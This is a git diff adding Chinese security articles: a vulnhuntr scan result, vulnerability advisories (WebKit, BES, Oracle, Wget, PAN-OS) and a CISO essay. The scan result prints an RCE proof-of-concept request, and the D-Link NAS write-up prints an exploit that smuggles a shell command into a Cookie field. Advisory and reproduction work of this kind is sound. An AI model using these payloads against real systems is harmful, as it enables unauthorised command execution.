+Analyzing the add_llm function in llm_app.py. 2. Identified user input used as keys to access dictionaries: EmbeddingModel, ChatModel, RerankModel, + +CvModel, and TTSModel. 3. These dictionaries contain class references, which are instantiated with user-supplied parameters. 4. The factory variable is + +directly used from user input (req['llm_factory']) without proper validation. 5. The llm_name is also derived from user input in most cases. 6. The + +instantiation of these classes occurs in try-except blocks, but exceptions are only used for error messages, not preventing execution. 7. The api_key + +and other sensitive information are passed directly to these instantiated classes. 8. There's no comprehensive input validation or sanitization for the + +factory or llm_name variables. 9. The vulnerability is in a route decorated with @login_required, indicating it's accessible to authenticated users. 10. + +Reviewing the EmbeddingModel, ChatModel, RerankModel, CvModel, and TTSModel dictionaries to understand their contents and potential for exploitation. + +---------------------------------------- + + + +analysis: + + The add_llm function in llm_app.py contains a critical Remote Code Execution (RCE) vulnerability. The function uses user-supplied input + +(req['llm_factory'] and req['llm_name']) to dynamically instantiate classes from the EmbeddingModel, ChatModel, RerankModel, CvModel, and TTSModel + +dictionaries. This pattern of using user input as a key to access and instantiate classes is inherently dangerous, as it allows an attacker to + +potentially execute arbitrary code. The vulnerability is exacerbated by the lack of comprehensive input validation or sanitization on these + +user-supplied values. While there are some checks for specific factory types, they are not exhaustive and can be bypassed. An attacker could potentially + +provide a malicious value for 'llm_factory' that, when used as an index to these model dictionaries, results in the execution of arbitrary code. The + +vulnerability is particularly severe because it occurs in a route decorated with @login_required, suggesting it's accessible to authenticated users, + +which might give a false sense of security. + +---------------------------------------- + + + +poc: + + POST /add_llm HTTP/1.1 + + Host: target.com + + Content-Type: application/json + + Authorization: Bearer + + + + { + + "llm_factory": "__import__('os').system", + + "llm_name": "id", + + "model_type": "EMBEDDING", + + "api_key": "dummy_key" + + } + + + + This payload attempts to exploit the vulnerability by setting 'llm_factory' to a string that, when evaluated, imports the os module and calls system. + +The 'llm_name' is set to 'id', which would be executed as a system command if the exploit is successful. + +---------------------------------------- + + + +confidence_score: + + 8 + +---------------------------------------- + + + +vulnerability_types: + + - RCE + +---------------------------------------- +``` +## + +**许可证协议** + + +## + +本项目的开发与发布遵循 +AGPL-3.0 +开源许可协议。 +## + +**项目地址** + + +## + +**vulnhuntr**: + + +https://github.com/daniel2005d/mapXplore + + +【 +FreeBuf粉丝交流群招新啦! + +在这里,拓宽网安边界 + +甲方安全建设干货; + +乙方最新技术理念; + +全球最新的网络安全资讯; + +群内不定期开启各种抽奖活动; + +FreeBuf盲盒、大象公仔...... + +扫码添加小蜜蜂微信回复「加群」,申请加入群聊 +】 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") +> https://protectai.com/threat-research/vulnhuntr-first-0-day-vulnerabilities +> https://huntr.com/ + + +> +> +> +> +> +> +> +> +> +> +> +> +> +> + + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect) + +![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + diff --git a/doc/【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md b/doc/【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md new file mode 100644 index 00000000..783c4b7e --- /dev/null +++ b/doc/【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md @@ -0,0 +1,91 @@ +# 【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击 + 安全圈 2024-11-20 11:00 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgOvEXHviaXu1fO2nLov9bZ055v7s8F6w1DD1I0bx2h3zaOx0Mibd5CngBwwj2nTeEbupw7xpBsx27Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +**关键词** + + + +安全漏洞 + + + +苹果本周发布安全公告宣布对 WebKit 引擎的两处高危安全漏洞进行修复,值得注意的是这些漏洞在修复前已经遭到黑客的积极利用,因此属于零日漏洞的范畴。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGyliaCTwNPicbduqUHbw6glwC074kfIV3LkvOFo0dLmNicC5OE61BKc4ekicWS9DOqyPul41A6m6bulVLjg/640?wx_fmt=png&from=appmsg "") + +**CVE-2024-44308:** + +黑客可以通过特制的 Web 内容导致任意代码执行,苹果获得的报告称该漏洞可能已经在基于 Intel 的 Mac 系统上被积极利用。 + +**CVE-2024-44309:** + +黑客可以通过特制的 Web 内容导致跨站脚本攻击,苹果获得的报告称该漏洞可能已经在基于 Intel 的 Mac 系统上被积极利用。 + +值得注意的是以上漏洞也在 iOS 和 iPadOS 中存在,因此苹果还发布了 iOS 18.1.1 和 iPadOS 18.1.1 版进行修复,不过暂时没有证据表明黑客也在 iOS 和 iPadOS 平台进行攻击。 + +发现并向苹果提交漏洞报告的是谷歌威胁分析小组的 Clément Lecigne 和 Benoît Sevens,其中 Clément Lecigne 提交的漏洞通常都是遭到黑客利用的,或者说直接点说这名研究人员发现的漏洞通常都是由国家级黑客利用的。 + +这类漏洞只会针对某些具有极高价值目标的用户发起攻击,这也是为什么苹果会在 iOS 中增加高级保护模式的原因,在这个模式下 JavaScript 脚本都会被禁止运行 (本次提到的两个漏洞就有一个是 JavaScript Core 中的问题)。 + + +来源:https://www.landiannews.com/archives/106713.html + + + +  END   + + +阅读推荐 + + +[【安全圈】2024全球最弱密码排名揭晓:“123456”再度登顶,你的密码安全吗?](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=1&sn=4670155de7d2f2afaa5fe30fda0bb2b0&chksm=f36e7d62c419f4745f1e8bba109c904e5aeda0df116d0348b08c58ebc5650933dc2d88c24c2c&scene=21#wechat_redirect) + + + +[【安全圈】谷歌Gemini AI 聊天机器人不断让用户“去死”](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=2&sn=690f569a72493488bb3ecd0770623b7e&chksm=f36e7d62c419f474675d76068180a0f3bdb5172cff33e5038437f76753bc0a27164756b87d36&scene=21#wechat_redirect) + + + +[【安全圈】美国饮用水系统存在300多个漏洞,影响1.1亿人](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=3&sn=45c8dff3a066a1615c872523d972e645&chksm=f36e7d62c419f474a8053972dd9c71ee6170c6482642d86218c62a4788ba6c3240875f3d16fb&scene=21#wechat_redirect) + + + +[【安全圈】VMware vCenter Server远程代码执行漏洞正被黑客广泛利用](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=4&sn=c7244d3c2cda936e8c968cf0a2ade6d0&chksm=f36e7d62c419f474201413fc6e1edcc5c024cfb6fa12a9adf16b49526e98689324bb9aa57fd0&scene=21#wechat_redirect) + + + + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "") + + + +![](https://mmbiz.qpic.cn/mmbiz_png/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEDQIyPYpjfp0XDaaKjeaU6YdFae1iagIvFmFb4djeiahnUy2jBnxkMbaw/640?wx_fmt=png "") + +**安全圈** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "") + + +←扫码关注我们 + +**网罗圈内热点 专注网络安全** + +**实时资讯一手掌握!** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "") + +**好看你就分享 有用就点个赞** + +**支持「****安全圈」就点个三连吧!** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "") + + + + + + diff --git a/doc/【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞.md b/doc/【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞.md new file mode 100644 index 00000000..3bdeda0c --- /dev/null +++ b/doc/【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞.md @@ -0,0 +1,63 @@ +# 【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞 + 长亭安全应急响应中心 2024-11-20 09:12 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/FOh11C4BDicRHecpOMm11jyacnwmf34dic0PmOs5sHcM0VdwWWUcyVCRrJ1menJtq7sm5mQ1gWMe6eegYURia1XKw/640?wx_fmt=jpeg&from=appmsg "") + +宝兰德BES应用服务器(BESAppServer)是一款遵循JavaEE和JakartaEE规范的企业级中间件,提供Web容器、EJB容器、JMS容器、事务服务、JNDI服务等关键组件,为企业级应用提供稳定、安全、高效的运行平台。2024年11月,宝兰德官方发布安全补丁修复了一个反序列化漏洞。该漏洞无需认证即可被攻击者利用,建议受影响的用户尽快修复此漏洞。 +**漏洞描述** + +  +Description  + + + +**0****1** + +漏洞成因宝兰德 BESAppServer 对于通过 TCP 协议传入的数据过滤不严格,允许未经授权的攻击者使用 TCP 协议向服务器发送特制的请求,可以利用反序列化漏洞在未经授权的情况下远程执行任意代码或控制服务器。漏洞影响成功利用该漏洞的攻击者可以实现远程代码执行,控制受影响的服务器,潜在的危害包括数据泄露、系统崩溃,甚至可能被用于传播勒索等恶意软件。处置优先级:高漏洞类型:反序列化漏洞危害等级:严重触发方式:网络远程权限认证要求:无需权限系统配置要求:默认配置可利用用户交互要求:无需用户交互利用成熟度:POC/EXP未公开批量可利用性:可使用通用 POC/EXP,批量检测/利用修复复杂度:低,官方提供补丁修复方案影响版本 Affects 02- 9.5.2版本未安装补丁9.5.2.4703.031.T003- 9.5.5版本未安装补丁9.5.5.7266.046解决方案 Solution 03临时缓解方案1. 修改/conf/server.config 配置文件:将ejb-container处的http-channel-enabled改为false将ejb-listener处的enabled改为false2. 限制访问来源地址,如非必要,不要将3000端口开放在互联网上。升级修复方案宝兰德官方已发布安全补丁,可联系官方售后获取补丁使用。漏洞复现 Reproduction 04 +**产品支持** + +  +Support  + + + +**05** +洞鉴:预计11月21日发布更新支持该漏洞检测。全悉:已发布规则升级包支持该漏洞利用行为的检测。雷池:非HTTP流量,不支持检测。 + +**时间线** + +  +Timeline  + + + +**06** +11月18日 互联网公开披露该漏洞11月20日 长亭安全应急响应中心发布通告 +参考资料: + +[1]. +https://www.bessystem.com/content/b00f1e9ee0ad49b8a8525eb0a1d38da9/info + + +**长亭应急响应服务** + + + + +全力进行产品升级 + +及时将风险提示预案发送给客户 + +检测业务是否受到此次漏洞影响 + +请联系长亭应急服务团队 + +7*24小时,守护您的安全 + + +第一时间找到我们: + +邮箱:support@chaitin.com + +应急响应热线:4000-327-707 + diff --git a/doc/【成功复现】D-Link NAS远程命令执行漏洞(Cookie).md b/doc/【成功复现】D-Link NAS远程命令执行漏洞(Cookie).md new file mode 100644 index 00000000..8a261331 --- /dev/null +++ b/doc/【成功复现】D-Link NAS远程命令执行漏洞(Cookie).md @@ -0,0 +1,27 @@ +# 【成功复现】D-Link NAS远程命令执行漏洞(Cookie) +原创 弥天安全实验室 弥天安全实验室 2024-11-20 10:30 + +网安引领时代,弥天点亮未来    + + + + + +  + +![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +**0x00写在前面** + + +**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!** +0x01漏洞介绍D-Link DNS-320等都是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link NAS设备的/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞在cookie中执行任意系统命令,写入后门文件,获取服务器权限。0x02影响版本 +1.D-Link DNS +0x03漏洞复现 +1.访问漏洞环境 + +![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hA1IrYe7NqeTx2vhRGiaQYKT08LgmFppRRfk6micOUgaH2h9G2umMhwPsI881ibe5bFiaeyW6WturCYMw/640?wx_fmt=png&from=appmsg "") +2.对漏洞进行复现 POC 漏洞复现GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Encoding: gzip, deflateConnection: closeCookie: username=mitian'& ps & echo 'mitian;      测试执行ps命令,通过响应判断漏洞存在。3.nuclei文件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.dlink.com/弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润!   弥  天安全实验室 + + diff --git a/doc/【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287).md b/doc/【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287).md new file mode 100644 index 00000000..3e1a0429 --- /dev/null +++ b/doc/【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287).md @@ -0,0 +1,48 @@ +# 【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287) + 启明星辰安全简讯 2024-11-20 08:43 + +**一、漏洞****概述** +
漏洞名称
 Oracle Agile PLM Framework文件泄露漏洞
CVE   ID
CVE-2024-21287
漏洞类型
信息泄露
发现时间
2024-11-19
漏洞评分
7.5
漏洞等级
高危
攻击向量
网络
所需权限
利用难度
用户交互
PoC/EXP
未公开
在野利用
已发现
+Oracle Agile PLM (Product Lifecycle Management) +Framework 是 Oracle 提供的一种产品生命周期管理解决方案,旨在帮助企业有效地管理产品的整个生命周期,包括从概念设计到生产、分销、售后等所有环节的流程和数据。它帮助企业通过集成产品数据、流程和协作,来提高产品开发的效率、降低成本、确保合规性并加速创新。 + +2024年11月19日,启明星辰集团VSRC监测到Oracle发布安全公告,攻击者正在积极利用Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287)获取敏感信息,该漏洞的CVSS评分为7.5。 + +Oracle Agile PLM Framework(组件:Software Development Kit和Pzrocess Extension)中存在信息泄露漏洞,未经身份验证的攻击者可以通过HTTP 访问并利用该漏洞,从而以PLM应用程序使用的权限下载目标系统上可访问的文件,成功利用该漏洞可能导致未授权访问并获取Oracle Agile PLM Framework 中存储的敏感数据或文件。 + +## 二、影响范围 + +Oracle Agile PLM Framework版本9.3.6 + +## 三、安全措施 +### 3.1 升级版本 + +目前Oracle已发布了该漏洞的补丁,受影响用户可及时更新。 + +参考链接: + +https://www.oracle.com/security-alerts/alert-cve-2024-21287.html +### 3.2 临时措施 + +暂无。 +### 3.3 通用建议 + +定期更新系统补丁,减少系统漏洞,提升服务器的安全性。 + +加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。 + +使用企业级安全产品,提升企业的网络安全性能。 + +加强系统用户和权限管理,启用多因素认证机制和最小权限原则,用户和软件权限应保持在最低限度。 + +启用强密码策略并设置为定期修改。 +### 3.4 参考链接 + +https://www.oracle.com/security-alerts/alert-cve-2024-21287.html + +https://blogs.oracle.com/security/post/alert-cve-2024-21287 + +https://nvd.nist.gov/vuln/detail/CVE-2024-21287 + + + diff --git a/doc/【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524).md b/doc/【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524).md new file mode 100644 index 00000000..4fc77ade --- /dev/null +++ b/doc/【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524).md @@ -0,0 +1,49 @@ +# 【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524) + 启明星辰安全简讯 2024-11-20 08:43 + +**一、漏洞****概述** +
漏洞名称
   Wget服务器端请求伪造漏洞
CVE   ID
CVE-2024-10524
漏洞类型
解析不当
发现时间
2024-11-20
漏洞评分
6.5
漏洞等级
中危
攻击向量
网络
所需权限
利用难度
用户交互
PoC/EXP
未公开
在野利用
未发现
+GNU Wget 是一个广泛使用的开源命令行工具,主要用于从网络上下载文件。它由GNU 项目开发,支持 HTTP、HTTPS 和 FTP 协议,因此可以用于从各种类型的网络服务器获取文件。 + +2024年11月20日,启明星辰集团VSRC监测到Wget中存在一个解析不当导致的服务器端请求伪造漏洞(CVE-2024-10524),该漏洞的CVSS评分为6.5,目前该漏洞的技术细节已公开。 + +Wget 1.24.5及之前版本中,由于Wget在处理HTTP简写格式URL时解析不当,错误地将包含冒号(:)的用户输入解析为FTP请求,导致将原本应为HTTP请求的URL错误地解析为FTP请求。攻击者可通过控制简写URL中的用户信息部分(例如malwaredomain:aaa@reliableserver)来改变请求目标,从而将请求发送到恶意服务器,该漏洞可能导致服务器端请求伪造攻击、钓鱼攻击、MITM(中间人)攻击和数据泄露等。 + +## 二、影响范围 + +Wget <= 1.24.5 + +## 三、安全措施 +### 3.1 升级版本 + +目前该漏洞已经修复,受影响用户可升级到Wget 1.25.0或更高版本。 + +下载链接: + +https://mirror.team-cymru.com/gnu/wget/wget-1.25.0.tar.gz +### 3.2 临时措施 + +暂无。 +### 3.3 通用建议 + +定期更新系统补丁,减少系统漏洞,提升服务器的安全性。 + +加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。 + +使用企业级安全产品,提升企业的网络安全性能。 + +加强系统用户和权限管理,启用多因素认证机制和最小权限原则,用户和软件权限应保持在最低限度。 + +启用强密码策略并设置为定期修改。 +### 3.4 参考链接 + +https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/ + +https://seclists.org/oss-sec/2024/q4/107 + +https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778 + +https://nvd.nist.gov/vuln/detail/CVE-2024-10524 + + + diff --git a/doc/【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474).md b/doc/【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474).md new file mode 100644 index 00000000..c5bc68e2 --- /dev/null +++ b/doc/【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474).md @@ -0,0 +1,28 @@ +# 【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474) +404实验室 知道创宇404实验室 2024-11-20 06:13 + +近日,国外WatchTowr lab披露了Palo Alto Networks PAN-OS中的两个严重漏洞:CVE-2024-0012和CVE-2024-9474,可导致未经授权的远程代码执行(RCE)。报告指出,CVE-2024-0012为身份验证绕过漏洞,而CVE-2024-9474则是远程代码执行漏洞,二者可以联合使用,潜在地允许攻击者在目标系统上执行恶意代码。WatchTowr lab公布漏洞细节及相关Poc,另根据Palo Alto unit42报告,称该漏洞在2024年11月18日存在野外利用痕迹,官方确认这两个漏洞补丁已发布。 + + +通过知道创宇旗下全球著名网络空间搜索引擎ZoomEye指纹搜索,有大量的Palo Alto Networks PAN-OS系统发布,再次提醒大家注意防御。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/3k9IT3oQhT0EWMdN8lVp4lmf8zaOib4XS0O6RZUMHFDichl9EgDjBQJEYsZ0TYic06eJYDk6nhwK8XXXofVZ37cGQ/640?wx_fmt=png&from=appmsg "") + +**修复建议:** + +1、更新到官方修复版本:立即升级到Palo Alto Networks官方发布的修复版本,确保系统不受该漏洞影响。 + +2、监测与审查:检查设备日志中的可疑活动,以确认是否存在异常访问或已经攻击利用的行为。 + + +**参考资料:** + +https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ + +https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ + +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0012 + +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474 + + diff --git a/doc/一名优秀CISO的自述:是什么成就了我?.md b/doc/一名优秀CISO的自述:是什么成就了我?.md new file mode 100644 index 00000000..01aff626 --- /dev/null +++ b/doc/一名优秀CISO的自述:是什么成就了我?.md @@ -0,0 +1,149 @@ +# 一名优秀CISO的自述:是什么成就了我? +管窥蠡测 安在 2024-11-20 09:31 + +![](https://mmbiz.qpic.cn/mmbiz_gif/5eH7xATwT3icpLmjpDSQkXx16oAygiaJncke0vYYJvIkuzECibrQJcUW4oAedTuib1G9m372rleJRDNXNs54fBEVicg/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") + + +从现实来看,CISO的职责已经超越了单纯的技术控制管理,扩展到了对业务战略的支撑。要想成为一名杰出的CISO,仅凭技术专长是远远不够的。为了高效工作,CISO需要平衡业务风险、抵御威胁,同时确保组织的韧性。 + + +Elastic的CISO Mandy Andress指出:“这一角色已经转变,不再仅仅关注技术或合规性,而是成为了一名需要了解业务战略,以便在应对风险与在最具影响力的领域投资之间做出权衡决策的业务领导者。” + + +随着这一思维方式的转变,安全事件被视为一种必然存在,现在的重点是如何为安全事件的发生做好准备,而不是去假设它不会发生。Andress对此回忆道:“20年前如果发生数据泄露,CISO往往会成为替罪羊,并面临失业的风险,因为当时我们追求的是零事件。”然而,当下的人们已经接受了安全设置并非尽善尽美的事实,因此组织必须专注于提升韧性,并为安全事件的发生做好准备。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTfKZD1icFqUqD4dGOw3EtGAKJbDvwUONOViaAINftcIicgwyx2ePwvtHVQw/640?wx_fmt=png&from=appmsg "") + + + + +**韧性和协调** + + + +过去,安全设置被视为一种非黑即白的二元选择——开或关。但现在,安全计划的设计需要能够帮助组织在事件发生时以最小的影响进行响应。因此,可以说响应和韧性规划是当下的重中之重,其涉及网络安全团队和业务运营团队的协作,并要求CISO在整个组织中进行协调,特别是在事件发生时。 + +Andress表示:“现在越来越多的人员会参与这一流程。因此,如果发生安全事件,涉及的将不仅仅是安全团队,还包括公关团队、通信团队,甚至可能包括高管,这取决于事件的规模和严重程度。” + +此外,CISO还在预算讨论中发挥着领导作用。过去,预算资金的分配往往伴随着尽可能多做事的要求,但如今,这些讨论已经变得更加细致入微。Andress指出:“这一角色的难点在于,我们需要认识到,尽管有很多我们希望能够以不同方式处理的事情,也有很多我们知道可以做得更好的事情,但这些并不是当前业务的重点。” + + +**关于SecOps与GRC:CISO的理想职业背景** + + + +CISO的出身背景具备多样化,其可能源自学术殿堂、职场磨砺或专业认证,然而,随着网络安全需求的持续演变,这些背景差异正被逐渐淡化。 + +据前CISO及现任董事会顾问Paul Connelly观察,以往SecOps背景的专家多聚焦于运营层面,而GRC背景的专家则侧重于通过合规性管理来降低风险。Connelly表示:“诚然,信息安全需要一定的技术基础,但CISO的角色并非限定于工程师或开发者。” + +CISO需对信息安全职责有全面的认知,但其职业起点并不局限于某一特定领域,无论是IT部门还是内部审计团队,均可成为CISO的起点,而多元的行业与公司经历能够赋予他们独特的思考视角。尤为重要的是,现代CISO需将安全工作与业务目标紧密结合。Connelly强调:“相较于仅在SecOps或其他单一领域深耕的晋升者,那些在组织内部历经多岗锻炼、视野开阔的CISO们,往往具备更多的竞争优势。” + +在规模较大的组织中,管理才能、领导力以及商业洞察力的重要性超越了技术能力。而在小型团队中,每位成员都需扮演多重角色,CISO通常还需担当技术领航者的重任。Connelly补充道:“此时,具备SecOps等技术基础便显得尤为重要了。” + +最为关键的是,CISO需具备引领安全议程的能力。为了赢得董事会及高管层的信任,他们需深入理解信息安全业务的精髓。为此,网络安全领导力课程应运而生,其旨在培养能够跨越业务领域、引领安全变革的领导者。 + +Connelly表示:“我们的目标是培养出既具备商业智慧,又擅长沟通,且能与法律、审计等部门紧密协作的网络安全领导者,这是当今CISO职位领导力的理想组合。” + +作为资深导师,Connelly为CISO们的职业发展及领导力塑造提供了宝贵建议。他建议大型组织中的CISO积极争取轮岗机会,以锻炼领导力。而若缺乏此类机会,那些有志于提升领导力的CISO则需主动寻求指导,并建立长期以业务目标为导向的合作关系,这可促进个人成长。Connelly建议道:“作为CISO,你需要找到一位愿意花时间为你提供建议、反馈,并能助你明确发展方向的导师。” + +Connelly进一步指出,在寻找导师时,应先明确自身的需求,再筛选潜在的导师人选,并通过直接联系或共同联系人建立沟通渠道。为了充分利用这段关系,学员应设定明确的目标,在每次交流中主导对话,同时保持开放态度,接纳导师的意见与建议,并根据实际情况进行调整。“在建立这段关系之初,你需明确想要实现的目标或那些希望解决的难题。” + + +**CISO的角色已转变为关键影响者** + + + +如今,CISO的职责不再局限于技术层面,其有效性更多地依赖于在组织内部建立影响力。为了确保安全能成为组织整体流程和职责的一部分,CISO必须积极构建人际关系,并与多个团队协同工作。 + +对于CISO来说,影响力是推动安全项目的核心要素。正如Andress所言,过去那种单纯依靠技术解决方案的时代已经过去,现在的关键在于倾听并综合各方观点。因此,寻求共同解决方案至关重要,而这种咨询方法对CISO有效履行其职责具有重大意义。Andress表示:“这就是影响力的体现,即了解如何与不同的人建立联系,进行个性化交流,并灵活应对各种情况。” + +![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTfslWI4CTSkbv9wv3rXYNlL5WDrNT0jjtrYHrP7sUHV0szHndH2RgpMg/640?wx_fmt=png&from=appmsg "") + + +要实现这一目标,需要深入理解不同团队的语言、需求和限制,从而促进更加积极的互动和讨论。Andress强调:“如果你带着‘这是唯一可行方法’的想法去沟通,那么很可能会引发对立关系;而如果你以‘这是我们共同目标,我们该携手合作’的态度出发,那么你就可以将焦点放在‘我们为什么要这么做’,以及‘它将如何助力业务成功或满足客户需求’上,从而营造出一种更加积极的互动氛围。” + +网络安全招聘PlaceMe Recruitment的招聘主管Killian O’Leary也认同这一点,他认为创造共同目标、吸引利益相关者和发挥影响力是CISO的重要特质。 + +在过去,CISO往往是一个相对孤立的角色,适合某种特定性格类型的人员,而现在这一角色正逐渐转变为强调领导力和协作。O’Leary指出:“在招聘新CISO时,组织对这些品质给予了高度重视。领导层正在寻找那些具有魅力、能够吸引追随者、并让追随者认同安全路线图的CISO。” + +根据O’Leary的经验,对于现代CISO来说,技术专长固然重要,但同样重要的是要认识到安全态势对不同的人而言有着不同的意味,这便要求了CISO需要了解不断变化的威胁,以能够引起领导层共鸣的方式提供见解,并在整个组织中培养安全思维。O’Leary强调:“优秀的CISO具备一定的魄力,因为他们能够进行艰难的对话,以友好的方式施加影响和提供建议,并了解他们的听众,同时推动他们的议程来赋能业务。” + 